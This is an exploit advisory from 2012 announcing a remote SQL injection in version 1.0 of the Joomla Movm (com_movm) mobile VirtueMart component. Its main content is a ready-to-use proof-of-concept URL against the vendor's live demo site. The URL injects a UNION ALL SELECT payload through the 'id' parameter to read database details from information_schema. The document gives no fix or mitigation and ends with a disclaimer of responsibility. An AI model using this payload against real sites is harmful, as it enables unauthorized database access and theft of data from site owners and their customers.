Joomla Movm component version 1.0 suffers from a remote SQL injection vulnerability.
e3427894cce8d8fa4ad201fc6f9ca8c75931c67318be35e15f273c5f4d5c3dc3
_______________________________________________________________________________________
Exploit Title: Joomla com_movm SQL Injection
Date: [31-07-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
site: http://poisonsecurity.wordpress.com/
Vendor: http://www.movm.net/
Version: 1.0 (Date Added 28 July 2012)
License: Commercial $ 49.99 us
Demo: http://www.movm.net/movm-mobile-virtuemart-site-demo/
Tested on: [Linux(bt5)-Windows(7ultimate)]
This component was released 3 days ago.be careful when using this component
Movm is a joomla extension for mobiles which optimize VirtueMart sites for iphone, android and blackberry.
It is compatible with Joomla2.5 and VirtueMart 2.0.Have used Jquery mobile, so it gives native effect to Web App.
This component can be Attacked from a mobile, put the following string in the url field.
p0C
http://www.movm.net/demo/index.php?option=com_movm&controller=product&task=product&id=999999'+UNION+ALL+SELECT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cdatabase()+FROM+information_schema.schemata--+D4NB4R%20
Im not responsible for which is given
No me hago responsable del uso que se le de
_______________________________________________________________________________________
Daniel Barragan "D4NB4R" 2012